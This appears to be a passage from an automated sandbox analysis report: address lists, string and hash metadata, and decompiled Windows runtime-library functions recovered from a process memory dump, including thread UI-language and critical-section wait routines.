                                                                                      0x017e27c7
                                                                                      0x01825c74
                                                                                      0x01825c79
                                                                                      0x01825c79
                                                                                      0x017e27c7
                                                                                      0x00000000
                                                                                      0x017e26c0
                                                                                      0x017e26c0
                                                                                      0x017e26c3
                                                                                      0x017e26c6
                                                                                      0x017e26c6
                                                                                      0x017e26c9
                                                                                      0x017e26c9
                                                                                      0x00000000
                                                                                      0x017e26c9
                                                                                      0x017e26ba
                                                                                      0x017e265b
                                                                                      0x017e265b
                                                                                      0x017e265e
                                                                                      0x017e2667
                                                                                      0x017e266d
                                                                                      0x017e2677
                                                                                      0x017e267c
                                                                                      0x017e267f
                                                                                      0x017e2681
                                                                                      0x01825b49
                                                                                      0x01825b4e
                                                                                      0x017e27cd
                                                                                      0x017e27d0
                                                                                      0x017e27d1
                                                                                      0x017e27d2
                                                                                      0x017e27d4
                                                                                      0x017e27dd
                                                                                      0x017e2687
                                                                                      0x017e2687
                                                                                      0x017e268a
                                                                                      0x017e268b
                                                                                      0x017e268e
                                                                                      0x017e268f
                                                                                      0x017e2691
                                                                                      0x017e2696
                                                                                      0x017e2698
                                                                                      0x017e269d
                                                                                      0x017e269f
                                                                                      0x00000000
                                                                                      0x017e269f
                                                                                      0x017e2681
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e2846
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e2605
                                                                                      0x017e260a
                                                                                      0x017e260c
                                                                                      0x017e2611
                                                                                      0x017e2616
                                                                                      0x017e2619
                                                                                      0x017e2619
                                                                                      0x017e261e
                                                                                      0x00000000
                                                                                      0x017e2624
                                                                                      0x017e2627
                                                                                      0x017e2627
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01825b1f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e2894
                                                                                      0x017e289b
                                                                                      0x017e289d
                                                                                      0x017e28a1
                                                                                      0x01825b2b
                                                                                      0x01825b2e
                                                                                      0x01825b2e
                                                                                      0x017e28a7

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PATH
                                                                                      • API String ID: 0-1036084923
                                                                                      • Opcode ID: fe3187eee5fd00f120956a44b04921db18ae38cc26305936d718e6765e634537
                                                                                      • Instruction ID: 0a3c40c3745b0caa42dba7d4cc9d4065653a9ef8da168e0560561854f43ed006
                                                                                      • Opcode Fuzzy Hash: fe3187eee5fd00f120956a44b04921db18ae38cc26305936d718e6765e634537
                                                                                      • Instruction Fuzzy Hash: F4C19EB1D40219DBDB25DFA8D885BAEFBF9FF48750F484029E601AB251DB34A941CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 80%
                                                                                      			E017EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                      				char _v5;
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				char _v16;
                                                                                      				char _v17;
                                                                                      				char _v20;
                                                                                      				signed int _v24;
                                                                                      				char _v28;
                                                                                      				char _v32;
                                                                                      				signed int _v40;
                                                                                      				void* __ecx;
                                                                                      				void* __edi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t73;
                                                                                      				intOrPtr* _t75;
                                                                                      				signed int _t77;
                                                                                      				signed int _t79;
                                                                                      				signed int _t81;
                                                                                      				intOrPtr _t83;
                                                                                      				intOrPtr _t85;
                                                                                      				intOrPtr _t86;
                                                                                      				signed int _t91;
                                                                                      				signed int _t94;
                                                                                      				signed int _t95;
                                                                                      				signed int _t96;
                                                                                      				signed int _t106;
                                                                                      				signed int _t108;
                                                                                      				signed int _t114;
                                                                                      				signed int _t116;
                                                                                      				signed int _t118;
                                                                                      				signed int _t122;
                                                                                      				signed int _t123;
                                                                                      				void* _t129;
                                                                                      				signed int _t130;
                                                                                      				void* _t132;
                                                                                      				intOrPtr* _t134;
                                                                                      				signed int _t138;
                                                                                      				signed int _t141;
                                                                                      				signed int _t147;
                                                                                      				intOrPtr _t153;
                                                                                      				signed int _t154;
                                                                                      				signed int _t155;
                                                                                      				signed int _t170;
                                                                                      				void* _t174;
                                                                                      				signed int _t176;
                                                                                      				signed int _t177;
                                                                                      
                                                                                      				_t129 = __ebx;
                                                                                      				_push(_t132);
                                                                                      				_push(__esi);
                                                                                      				_t174 = _t132;
                                                                                      				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                      				if(_t73 >= 0) {
                                                                                      					L5:
                                                                                      					return _t73;
                                                                                      				} else {
                                                                                      					E017CEEF0(0x18a7b60);
                                                                                      					_t134 =  *0x18a7b84; // 0x771c7b80
                                                                                      					_t2 = _t174 + 0x24; // 0x24
                                                                                      					_t75 = _t2;
                                                                                      					if( *_t134 != 0x18a7b80) {
                                                                                      						_push(3);
                                                                                      						asm("int 0x29");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						asm("int3");
                                                                                      						_push(0x18a7b60);
                                                                                      						_t170 = _v8;
                                                                                      						_v28 = 0;
                                                                                      						_v40 = 0;
                                                                                      						_v24 = 0;
                                                                                      						_v17 = 0;
                                                                                      						_v32 = 0;
                                                                                      						__eflags = _t170 & 0xffff7cf2;
                                                                                      						if((_t170 & 0xffff7cf2) != 0) {
                                                                                      							L43:
                                                                                      							_t77 = 0xc000000d;
                                                                                      						} else {
                                                                                      							_t79 = _t170 & 0x0000000c;
                                                                                      							__eflags = _t79;
                                                                                      							if(_t79 != 0) {
                                                                                      								__eflags = _t79 - 0xc;
                                                                                      								if(_t79 == 0xc) {
                                                                                      									goto L43;
                                                                                      								} else {
                                                                                      									goto L9;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t170 = _t170 | 0x00000008;
                                                                                      								__eflags = _t170;
                                                                                      								L9:
                                                                                      								_t81 = _t170 & 0x00000300;
                                                                                      								__eflags = _t81 - 0x300;
                                                                                      								if(_t81 == 0x300) {
                                                                                      									goto L43;
                                                                                      								} else {
                                                                                      									_t138 = _t170 & 0x00000001;
                                                                                      									__eflags = _t138;
                                                                                      									_v24 = _t138;
                                                                                      									if(_t138 != 0) {
                                                                                      										__eflags = _t81;
                                                                                      										if(_t81 != 0) {
                                                                                      											goto L43;
                                                                                      										} else {
                                                                                      											goto L11;
                                                                                      										}
                                                                                      									} else {
                                                                                      										L11:
                                                                                      										_push(_t129);
                                                                                      										_t77 = E017C6D90( &_v20);
                                                                                      										_t130 = _t77;
                                                                                      										__eflags = _t130;
                                                                                      										if(_t130 >= 0) {
                                                                                      											_push(_t174);
                                                                                      											__eflags = _t170 & 0x00000301;
                                                                                      											if((_t170 & 0x00000301) == 0) {
                                                                                      												_t176 = _a8;
                                                                                      												__eflags = _t176;
                                                                                      												if(__eflags == 0) {
                                                                                      													L64:
                                                                                      													_t83 =  *[fs:0x18];
                                                                                      													_t177 = 0;
                                                                                      													__eflags =  *(_t83 + 0xfb8);
                                                                                      													if( *(_t83 + 0xfb8) != 0) {
                                                                                      														E017C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                      													}
                                                                                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                      													goto L15;
                                                                                      												} else {
                                                                                      													asm("sbb edx, edx");
                                                                                      													_t114 = E01858938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                      													__eflags = _t114;
                                                                                      													if(_t114 < 0) {
                                                                                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                      														E017BB150();
                                                                                      													}
                                                                                      													_t116 = E01856D81(_t176,  &_v16);
                                                                                      													__eflags = _t116;
                                                                                      													if(_t116 >= 0) {
                                                                                      														__eflags = _v16 - 2;
                                                                                      														if(_v16 < 2) {
                                                                                      															L56:
                                                                                      															_t118 = E017C75CE(_v20, 5, 0);
                                                                                      															__eflags = _t118;
                                                                                      															if(_t118 < 0) {
                                                                                      																L67:
                                                                                      																_t130 = 0xc0000017;
                                                                                      																goto L32;
                                                                                      															} else {
                                                                                      																__eflags = _v12;
                                                                                      																if(_v12 == 0) {
                                                                                      																	goto L67;
                                                                                      																} else {
                                                                                      																	_t153 =  *0x18a8638; // 0x0
                                                                                      																	_t122 = L017C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                      																	_t154 = _v12;
                                                                                      																	_t130 = _t122;
                                                                                      																	__eflags = _t130;
                                                                                      																	if(_t130 >= 0) {
                                                                                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                      																		__eflags = _t123;
                                                                                      																		if(_t123 != 0) {
                                                                                      																			_t155 = _a12;
                                                                                      																			__eflags = _t155;
                                                                                      																			if(_t155 != 0) {
                                                                                      																				 *_t155 = _t123;
                                                                                      																			}
                                                                                      																			goto L64;
                                                                                      																		} else {
                                                                                      																			E017C76E2(_t154);
                                                                                      																			goto L41;
                                                                                      																		}
                                                                                      																	} else {
                                                                                      																		E017C76E2(_t154);
                                                                                      																		_t177 = 0;
                                                                                      																		goto L18;
                                                                                      																	}
                                                                                      																}
                                                                                      															}
                                                                                      														} else {
                                                                                      															__eflags =  *_t176;
                                                                                      															if( *_t176 != 0) {
                                                                                      																goto L56;
                                                                                      															} else {
                                                                                      																__eflags =  *(_t176 + 2);
                                                                                      																if( *(_t176 + 2) == 0) {
                                                                                      																	goto L64;
                                                                                      																} else {
                                                                                      																	goto L56;
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      													} else {
                                                                                      														_t130 = 0xc000000d;
                                                                                      														goto L32;
                                                                                      													}
                                                                                      												}
                                                                                      												goto L35;
                                                                                      											} else {
                                                                                      												__eflags = _a8;
                                                                                      												if(_a8 != 0) {
                                                                                      													_t77 = 0xc000000d;
                                                                                      												} else {
                                                                                      													_v5 = 1;
                                                                                      													L017EFCE3(_v20, _t170);
                                                                                      													_t177 = 0;
                                                                                      													__eflags = 0;
                                                                                      													L15:
                                                                                      													_t85 =  *[fs:0x18];
                                                                                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                      														L18:
                                                                                      														__eflags = _t130;
                                                                                      														if(_t130 != 0) {
                                                                                      															goto L32;
                                                                                      														} else {
                                                                                      															__eflags = _v5 - _t130;
                                                                                      															if(_v5 == _t130) {
                                                                                      																goto L32;
                                                                                      															} else {
                                                                                      																_t86 =  *[fs:0x18];
                                                                                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                      																}
                                                                                      																__eflags = _t177;
                                                                                      																if(_t177 == 0) {
                                                                                      																	L31:
                                                                                      																	__eflags = 0;
                                                                                      																	L017C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                      																	goto L32;
                                                                                      																} else {
                                                                                      																	__eflags = _v24;
                                                                                      																	_t91 =  *(_t177 + 0x20);
                                                                                      																	if(_v24 != 0) {
                                                                                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                      																		goto L31;
                                                                                      																	} else {
                                                                                      																		_t141 = _t91 & 0x00000040;
                                                                                      																		__eflags = _t170 & 0x00000100;
                                                                                      																		if((_t170 & 0x00000100) == 0) {
                                                                                      																			__eflags = _t141;
                                                                                      																			if(_t141 == 0) {
                                                                                      																				L74:
                                                                                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                      																				goto L27;
                                                                                      																			} else {
                                                                                      																				_t177 = E017EFD22(_t177);
                                                                                      																				__eflags = _t177;
                                                                                      																				if(_t177 == 0) {
                                                                                      																					goto L42;
                                                                                      																				} else {
                                                                                      																					_t130 = E017EFD9B(_t177, 0, 4);
                                                                                      																					__eflags = _t130;
                                                                                      																					if(_t130 != 0) {
                                                                                      																						goto L42;
                                                                                      																					} else {
                                                                                      																						_t68 = _t177 + 0x20;
                                                                                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                      																						__eflags =  *_t68;
                                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                                      																						goto L74;
                                                                                      																					}
                                                                                      																				}
                                                                                      																			}
                                                                                      																			goto L35;
                                                                                      																		} else {
                                                                                      																			__eflags = _t141;
                                                                                      																			if(_t141 != 0) {
                                                                                      																				_t177 = E017EFD22(_t177);
                                                                                      																				__eflags = _t177;
                                                                                      																				if(_t177 == 0) {
                                                                                      																					L42:
                                                                                      																					_t77 = 0xc0000001;
                                                                                      																					goto L33;
                                                                                      																				} else {
                                                                                      																					_t130 = E017EFD9B(_t177, 0, 4);
                                                                                      																					__eflags = _t130;
                                                                                      																					if(_t130 != 0) {
                                                                                      																						goto L42;
                                                                                      																					} else {
                                                                                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                                      																						goto L26;
                                                                                      																					}
                                                                                      																				}
                                                                                      																				goto L35;
                                                                                      																			} else {
                                                                                      																				L26:
                                                                                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                      																				__eflags = _t94;
                                                                                      																				L27:
                                                                                      																				 *(_t177 + 0x20) = _t94;
                                                                                      																				__eflags = _t170 & 0x00008000;
                                                                                      																				if((_t170 & 0x00008000) != 0) {
                                                                                      																					_t95 = _a12;
                                                                                      																					__eflags = _t95;
                                                                                      																					if(_t95 != 0) {
                                                                                      																						_t96 =  *_t95;
                                                                                      																						__eflags = _t96;
                                                                                      																						if(_t96 != 0) {
                                                                                      																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                      																							_t40 = _t177 + 0x20;
                                                                                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                      																							__eflags =  *_t40;
                                                                                      																						}
                                                                                      																					}
                                                                                      																				}
                                                                                      																				goto L31;
                                                                                      																			}
                                                                                      																		}
                                                                                      																	}
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      													} else {
                                                                                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                      														_t106 =  *(_t147 + 0x20);
                                                                                      														__eflags = _t106 & 0x00000040;
                                                                                      														if((_t106 & 0x00000040) != 0) {
                                                                                      															_t147 = E017EFD22(_t147);
                                                                                      															__eflags = _t147;
                                                                                      															if(_t147 == 0) {
                                                                                      																L41:
                                                                                      																_t130 = 0xc0000001;
                                                                                      																L32:
                                                                                      																_t77 = _t130;
                                                                                      																goto L33;
                                                                                      															} else {
                                                                                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                      																_t106 =  *(_t147 + 0x20);
                                                                                      																goto L17;
                                                                                      															}
                                                                                      															goto L35;
                                                                                      														} else {
                                                                                      															L17:
                                                                                      															_t108 = _t106 | 0x00000080;
                                                                                      															__eflags = _t108;
                                                                                      															 *(_t147 + 0x20) = _t108;
                                                                                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                      															goto L18;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      											L33:
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						L35:
                                                                                      						return _t77;
                                                                                      					} else {
                                                                                      						 *_t75 = 0x18a7b80;
                                                                                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                      						 *_t134 = _t75;
                                                                                      						 *0x18a7b84 = _t75;
                                                                                      						_t73 = E017CEB70(_t134, 0x18a7b60);
                                                                                      						if( *0x18a7b20 != 0) {
                                                                                      							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                      							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                      								_t73 = E017CFF60( *0x18a7b20);
                                                                                      							}
                                                                                      						}
                                                                                      						goto L5;
                                                                                      					}
                                                                                      				}
                                                                                      			}


















































                                                                                      Strings
                                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0182BE0F
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                      • API String ID: 0-865735534
                                                                                      • Opcode ID: 3a9521fd358905eceec613e118539eca23049befb6bcae241e491e1cc5a3b3f2
                                                                                      • Instruction ID: 08249bcc81e9be563ee7e32b974bc71c05e5311a82c140dd706a3e2e9a2bd6ac
                                                                                      • Opcode Fuzzy Hash: 3a9521fd358905eceec613e118539eca23049befb6bcae241e491e1cc5a3b3f2
                                                                                      • Instruction Fuzzy Hash: 2EA14871B016168BEB26CF6CC458BBAF7E5AF4C710F14456DDA06CBA91EB30D941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 63%
                                                                                      			E017B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                      				signed char _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				signed int _v52;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				intOrPtr _t55;
                                                                                      				signed int _t57;
                                                                                      				signed int _t58;
                                                                                      				char* _t62;
                                                                                      				signed char* _t63;
                                                                                      				signed char* _t64;
                                                                                      				signed int _t67;
                                                                                      				signed int _t72;
                                                                                      				signed int _t77;
                                                                                      				signed int _t78;
                                                                                      				signed int _t88;
                                                                                      				intOrPtr _t89;
                                                                                      				signed char _t93;
                                                                                      				signed int _t97;
                                                                                      				signed int _t98;
                                                                                      				signed int _t102;
                                                                                      				signed int _t103;
                                                                                      				intOrPtr _t104;
                                                                                      				signed int _t105;
                                                                                      				signed int _t106;
                                                                                      				signed char _t109;
                                                                                      				signed int _t111;
                                                                                      				void* _t116;
                                                                                      
                                                                                      				_t102 = __edi;
                                                                                      				_t97 = __edx;
                                                                                      				_v12 = _v12 & 0x00000000;
                                                                                      				_t55 =  *[fs:0x18];
                                                                                      				_t109 = __ecx;
                                                                                      				_v8 = __edx;
                                                                                      				_t86 = 0;
                                                                                      				_v32 = _t55;
                                                                                      				_v24 = 0;
                                                                                      				_push(__edi);
                                                                                      				if(__ecx == 0x18a5350) {
                                                                                      					_t86 = 1;
                                                                                      					_v24 = 1;
                                                                                      					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                      				}
                                                                                      				_t103 = _t102 | 0xffffffff;
                                                                                      				if( *0x18a7bc8 != 0) {
                                                                                      					_push(0xc000004b);
                                                                                      					_push(_t103);
                                                                                      					E017F97C0();
                                                                                      				}
                                                                                      				if( *0x18a79c4 != 0) {
                                                                                      					_t57 = 0;
                                                                                      				} else {
                                                                                      					_t57 = 0x18a79c8;
                                                                                      				}
                                                                                      				_v16 = _t57;
                                                                                      				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                                      					_t93 = _t109;
                                                                                      					L23();
                                                                                      				}
                                                                                      				_t58 =  *_t109;
                                                                                      				if(_t58 == _t103) {
                                                                                      					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                                      					_t58 = _t103;
                                                                                      					if(__eflags == 0) {
                                                                                      						_t93 = _t109;
                                                                                      						E017E1624(_t86, __eflags);
                                                                                      						_t58 =  *_t109;
                                                                                      					}
                                                                                      				}
                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                      				if(_t58 != _t103) {
                                                                                      					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                      				}
                                                                                      				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                      				_t88 = _v16;
                                                                                      				_v28 = _t104;
                                                                                      				L9:
                                                                                      				while(1) {
                                                                                      					if(E017D7D50() != 0) {
                                                                                      						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                      					} else {
                                                                                      						_t62 = 0x7ffe0382;
                                                                                      					}
                                                                                      					if( *_t62 != 0) {
                                                                                      						_t63 =  *[fs:0x30];
                                                                                      						__eflags = _t63[0x240] & 0x00000002;
                                                                                      						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                      							_t93 = _t109;
                                                                                      							E0184FE87(_t93);
                                                                                      						}
                                                                                      					}
                                                                                      					if(_t104 != 0xffffffff) {
                                                                                      						_push(_t88);
                                                                                      						_push(0);
                                                                                      						_push(_t104);
                                                                                      						_t64 = E017F9520();
                                                                                      						goto L15;
                                                                                      					} else {
                                                                                      						while(1) {
                                                                                      							_t97 =  &_v8;
                                                                                      							_t64 = E017EE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                      							if(_t64 == 0x102) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t93 =  *(_t109 + 4);
                                                                                      							_v8 = _t93;
                                                                                      							if((_t93 & 0x00000002) != 0) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							L15:
                                                                                      							if(_t64 == 0x102) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t89 = _v24;
                                                                                      							if(_t64 < 0) {
                                                                                      								L0180DF30(_t93, _t97, _t64);
                                                                                      								_push(_t93);
                                                                                      								_t98 = _t97 | 0xffffffff;
                                                                                      								__eflags =  *0x18a6901;
                                                                                      								_push(_t109);
                                                                                      								_v52 = _t98;
                                                                                      								if( *0x18a6901 != 0) {
                                                                                      									_push(0);
                                                                                      									_push(1);
                                                                                      									_push(0);
                                                                                      									_push(0x100003);
                                                                                      									_push( &_v12);
                                                                                      									_t72 = E017F9980();
                                                                                      									__eflags = _t72;
                                                                                      									if(_t72 < 0) {
                                                                                      										_v12 = _t98 | 0xffffffff;
                                                                                      									}
                                                                                      								}
                                                                                      								asm("lock cmpxchg [ecx], edx");
                                                                                      								_t111 = 0;
                                                                                      								__eflags = 0;
                                                                                      								if(0 != 0) {
                                                                                      									__eflags = _v12 - 0xffffffff;
                                                                                      									if(_v12 != 0xffffffff) {
                                                                                      										_push(_v12);
                                                                                      										E017F95D0();
                                                                                      									}
                                                                                      								} else {
                                                                                      									_t111 = _v12;
                                                                                      								}
                                                                                      								return _t111;
                                                                                      							} else {
                                                                                      								if(_t89 != 0) {
                                                                                      									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                      									_t77 = E017D7D50();
                                                                                      									__eflags = _t77;
                                                                                      									if(_t77 == 0) {
                                                                                      										_t64 = 0x7ffe0384;
                                                                                      									} else {
                                                                                      										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                      									}
                                                                                      									__eflags =  *_t64;
                                                                                      									if( *_t64 != 0) {
                                                                                      										_t64 =  *[fs:0x30];
                                                                                      										__eflags = _t64[0x240] & 0x00000004;
                                                                                      										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                      											_t78 = E017D7D50();
                                                                                      											__eflags = _t78;
                                                                                      											if(_t78 == 0) {
                                                                                      												_t64 = 0x7ffe0385;
                                                                                      											} else {
                                                                                      												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                      											}
                                                                                      											__eflags =  *_t64 & 0x00000020;
                                                                                      											if(( *_t64 & 0x00000020) != 0) {
                                                                                      												_t64 = E01837016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								return _t64;
                                                                                      							}
                                                                                      						}
                                                                                      						_t97 = _t88;
                                                                                      						_t93 = _t109;
                                                                                      						E0184FDDA(_t97, _v12);
                                                                                      						_t105 =  *_t109;
                                                                                      						_t67 = _v12 + 1;
                                                                                      						_v12 = _t67;
                                                                                      						__eflags = _t105 - 0xffffffff;
                                                                                      						if(_t105 == 0xffffffff) {
                                                                                      							_t106 = 0;
                                                                                      							__eflags = 0;
                                                                                      						} else {
                                                                                      							_t106 =  *(_t105 + 0x14);
                                                                                      						}
                                                                                      						__eflags = _t67 - 2;
                                                                                      						if(_t67 > 2) {
                                                                                      							__eflags = _t109 - 0x18a5350;
                                                                                      							if(_t109 != 0x18a5350) {
                                                                                      								__eflags = _t106 - _v20;
                                                                                      								if(__eflags == 0) {
                                                                                      									_t93 = _t109;
                                                                                      									E0184FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						_push("RTL: Re-Waiting\n");
                                                                                      						_push(0);
                                                                                      						_push(0x65);
                                                                                      						_v20 = _t106;
                                                                                      						E01845720();
                                                                                      						_t104 = _v28;
                                                                                      						_t116 = _t116 + 0xc;
                                                                                      						continue;
                                                                                      					}
                                                                                      				}
                                                                                      			}
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017b2e44
                                                                                      0x017b2e47
                                                                                      0x017b2e4d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017b2e4f
                                                                                      0x017b2e54
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017b2e5a
                                                                                      0x017b2e5f
                                                                                      0x017b2e9a
                                                                                      0x017b2ea4
                                                                                      0x017b2ea5
                                                                                      0x017b2ea8
                                                                                      0x017b2eaf
                                                                                      0x017b2eb2
                                                                                      0x017b2eb5
                                                                                      0x0180fae9
                                                                                      0x0180faeb
                                                                                      0x0180faed
                                                                                      0x0180faef
                                                                                      0x0180faf7
                                                                                      0x0180faf8
                                                                                      0x0180fafd
                                                                                      0x0180faff
                                                                                      0x0180fb04
                                                                                      0x0180fb04
                                                                                      0x0180faff
                                                                                      0x017b2ec0
                                                                                      0x017b2ec4
                                                                                      0x017b2ec6
                                                                                      0x017b2ec8
                                                                                      0x0180fb14
                                                                                      0x0180fb18
                                                                                      0x0180fb1e
                                                                                      0x0180fb21
                                                                                      0x0180fb21
                                                                                      0x017b2ece
                                                                                      0x017b2ece
                                                                                      0x017b2ece
                                                                                      0x017b2ed7
                                                                                      0x017b2e61
                                                                                      0x017b2e63
                                                                                      0x0180fa6b
                                                                                      0x0180fa71
                                                                                      0x0180fa76
                                                                                      0x0180fa78
                                                                                      0x0180fa8a
                                                                                      0x0180fa7a
                                                                                      0x0180fa83
                                                                                      0x0180fa83
                                                                                      0x0180fa8f
                                                                                      0x0180fa91
                                                                                      0x0180fa97
                                                                                      0x0180fa9d
                                                                                      0x0180faa4
                                                                                      0x0180faaa
                                                                                      0x0180faaf
                                                                                      0x0180fab1
                                                                                      0x0180fac3
                                                                                      0x0180fab3
                                                                                      0x0180fabc
                                                                                      0x0180fabc
                                                                                      0x0180fac8
                                                                                      0x0180facb
                                                                                      0x0180fadf
                                                                                      0x0180fadf
                                                                                      0x0180facb
                                                                                      0x0180faa4
                                                                                      0x0180fa91
                                                                                      0x017b2e6f
                                                                                      0x017b2e6f
                                                                                      0x017b2e5f
                                                                                      0x0180fa13
                                                                                      0x0180fa15
                                                                                      0x0180fa17
                                                                                      0x0180fa1f
                                                                                      0x0180fa21
                                                                                      0x0180fa22
                                                                                      0x0180fa25
                                                                                      0x0180fa28
                                                                                      0x0180fa2f
                                                                                      0x0180fa2f
                                                                                      0x0180fa2a
                                                                                      0x0180fa2a
                                                                                      0x0180fa2a
                                                                                      0x0180fa31
                                                                                      0x0180fa34
                                                                                      0x0180fa36
                                                                                      0x0180fa3c
                                                                                      0x0180fa3e
                                                                                      0x0180fa41
                                                                                      0x0180fa43
                                                                                      0x0180fa45
                                                                                      0x0180fa45
                                                                                      0x0180fa41
                                                                                      0x0180fa3c
                                                                                      0x0180fa4a
                                                                                      0x0180fa4f
                                                                                      0x0180fa51
                                                                                      0x0180fa53
                                                                                      0x0180fa56
                                                                                      0x0180fa5b
                                                                                      0x0180fa5e
                                                                                      0x00000000
                                                                                      0x0180fa5e
                                                                                      0x017b2e23

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Re-Waiting
                                                                                      • API String ID: 0-316354757
                                                                                      • Opcode ID: 4dd5e14b55ff2e8416b85cf3fe4722e77167c7a93b81fbddadee420c72f96286
                                                                                      • Instruction ID: 498ce3847208f577461d3ff0315e0759879e5dadf4694de996232876eb13ea7f
                                                                                      • Opcode Fuzzy Hash: 4dd5e14b55ff2e8416b85cf3fe4722e77167c7a93b81fbddadee420c72f96286
                                                                                      • Instruction Fuzzy Hash: 12612831A016099FEB33DF6CC888BBEB7A4EB44714F144699E611D72C2C734AA81C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 80%
                                                                                      			E01880EA5(void* __ecx, void* __edx) {
